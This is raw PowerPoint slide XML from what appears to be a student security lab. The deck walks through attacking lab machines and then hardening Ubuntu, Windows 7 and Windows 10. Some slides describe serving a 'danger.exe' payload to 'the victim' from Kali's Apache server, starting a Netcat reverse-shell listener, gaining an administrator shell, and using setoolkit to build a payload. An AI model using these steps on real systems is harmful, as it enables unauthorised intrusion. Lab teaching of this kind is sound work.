    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281332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8941" y="141668"/>
            <a:ext cx="1353512" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Windows 7</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41" y="628248"/>
            <a:ext cx="6276975" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218941" y="3885798"/>
            <a:ext cx="10473773" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the current directory, the above shown command will create a file with the name “danger.exe”. Let’s cross check its existence and file permissions using the following command.ls –l “danger.exe”.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218941" y="4858704"/>
            <a:ext cx="11651087" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As we can notice, this executable doesn’t have executable permissions. Therefore, we can give executable permissions using the following command: chmod +x danger.exe</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218941" y="5689955"/>
            <a:ext cx="11509420" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, our file is ready and we should send it to the victim. Let’s copy this file onto the preinstalled apache server’s root directory in Kali Linux: cp danger.exe /var/www/html.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1979181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10" y="115910"/>
            <a:ext cx="1746825" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Patching Ubuntu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115910" y="605307"/>
            <a:ext cx="7193701" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To prevent access to the root via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, remotely we will deny the root login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32" y="1094704"/>
            <a:ext cx="6410325" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="212032" y="2768958"/>
            <a:ext cx="7454477" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will turn off the password authentication and make it key authentication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4744"/>
            <a:ext cx="10232951" cy="12500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156" y="4932609"/>
            <a:ext cx="10777881" cy="1159098"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5797301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10" y="128789"/>
            <a:ext cx="10868089" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We installed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lynis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to run numerous tests on various components of your system, including system files, security settings, installed software, and configuration files.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56" y="912120"/>
            <a:ext cx="7572375" cy="15049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556" y="2554070"/>
            <a:ext cx="7448550" cy="21145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556" y="4918321"/>
            <a:ext cx="7867650" cy="1400175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3325683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305" y="115910"/>
            <a:ext cx="10212946" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Minimize Open Ports: Only keep ports open that are necessary for your application or service requirements. For example, if you are not using Telnet (which is generally insecure), it should be disabled and its port closed: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956" y="1183917"/>
            <a:ext cx="7162977" cy="1391858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180305" y="2833352"/>
            <a:ext cx="10650827" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP and HTTPS:Ensure that HTTP (port 80) and HTTPS (port 443) are open only if you are running a web server that requires these ports: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956" y="3613664"/>
            <a:ext cx="7855249" cy="2284860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="690191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425" y="180304"/>
            <a:ext cx="4295407" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is what the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> firewall looks like now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30" y="549636"/>
            <a:ext cx="5158055" cy="3348834"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167425" y="4047400"/>
            <a:ext cx="10041040" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rules Breakdown:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (HTTP) and 443/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (HTTPS): Allows incoming web traffic. Necessary if you are hosting a website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-23/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Telnet): Deny incoming. Correctly set to block insecure Telnet connections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Apache) and related Apache (v6): Specific rules for allowing web traffic via Apache. Appears redundant if general port 80/443 rules are set, unless these have specific IP restrictions not shown.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-53/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and 53/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>udp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (DNS): Allows incoming DNS queries. Ensure this is necessary; typically, a server would only need this if it's acting as a DNS server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (SSH): Allows SSH connections from the local network (192.168.6.0/24). This is good as it restricts SSH access to local network addresses, enhancing security.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88828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668" y="180302"/>
            <a:ext cx="8761554" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Logging Level: If you're fine-tuning security or troubleshooting, you might temporarily increase the logging level to medium or high to capture more details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68" y="1071525"/>
            <a:ext cx="4010025" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141668" y="1652550"/>
            <a:ext cx="4680512" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Denying incoming connection  unless we need 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62" y="2144328"/>
            <a:ext cx="4448175" cy="1581150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141668" y="3847924"/>
            <a:ext cx="10998557" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since the logging is set to high we will get detailed logs which is useful for identifying unauthorized access to other unwanted traffic</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668" y="4592193"/>
            <a:ext cx="4317331" cy="1728104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2831882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788" y="1744433"/>
            <a:ext cx="5238165" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This is the result of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> scan after securing the ports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88" y="2470127"/>
            <a:ext cx="5867400" cy="1685925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2053177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1B8E04-4D35-407C-9ADF-EBF211A3F3F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4431121" y="3044279"/>
            <a:ext cx="3329758" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0"/>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="247377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909" y="90152"/>
            <a:ext cx="10115270" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, let’s start the webserver in Kali using the following command: service apache2 start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909" y="564658"/>
            <a:ext cx="6362700" cy="2457450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115909" y="3127282"/>
            <a:ext cx="9241761" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finally, let us start a Netcat listener for a reverse shell using the following command.nc –lvp 4444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09" y="3496614"/>
            <a:ext cx="4618948" cy="3239037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="832178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031" y="0"/>
            <a:ext cx="3150030" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ve established a connection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31" y="506704"/>
            <a:ext cx="5867400" cy="1543050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="103031" y="2187126"/>
            <a:ext cx="11572134" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We got our first shell. Now, it’s time for us to go further and see what privileges we have on the target.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31" y="3011507"/>
            <a:ext cx="7345048" cy="2496356"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5507863"/>
            <a:ext cx="10674719" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The above command shows the current user name who is logged in, but we can’t see the privileges. However, we came to know that the username is “user”. So, let us use the following command to view his rights.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3781198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36" y="207403"/>
            <a:ext cx="6000750" cy="4305300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223636" y="4662152"/>
            <a:ext cx="9807728" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This user is a part of Administrators group. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1081122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426" y="90152"/>
            <a:ext cx="2211118" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- Securing Windows 7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="167426" y="459484"/>
            <a:ext cx="10180992" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To make sure windows 7 doesn’t get hacked we close all the ports and enable the firewall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26" y="919564"/>
            <a:ext cx="6076950" cy="18764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26" y="2886737"/>
            <a:ext cx="7591425" cy="3829050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116109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7426" y="128789"/>
            <a:ext cx="1635641" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318052" y="1426684"/>
            <a:ext cx="8560905" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We start by entering the command: sudo setoolkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Then we enter 1 in order to get into the social engineering attacks menu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8ADE464-8410-40C8-BA7D-E785041263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052" y="2189463"/>
            <a:ext cx="3705225" cy="2019300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E36179EC-6853-49D0-B9F5-7413DFDC801F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="318052" y="940904"/>
            <a:ext cx="8701421" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our objective is to make a successful reverse shell connection using setoolkit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3894838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971" y="1091981"/>
            <a:ext cx="8229186" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now, our objective is to create a payload and a listener so we enter 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
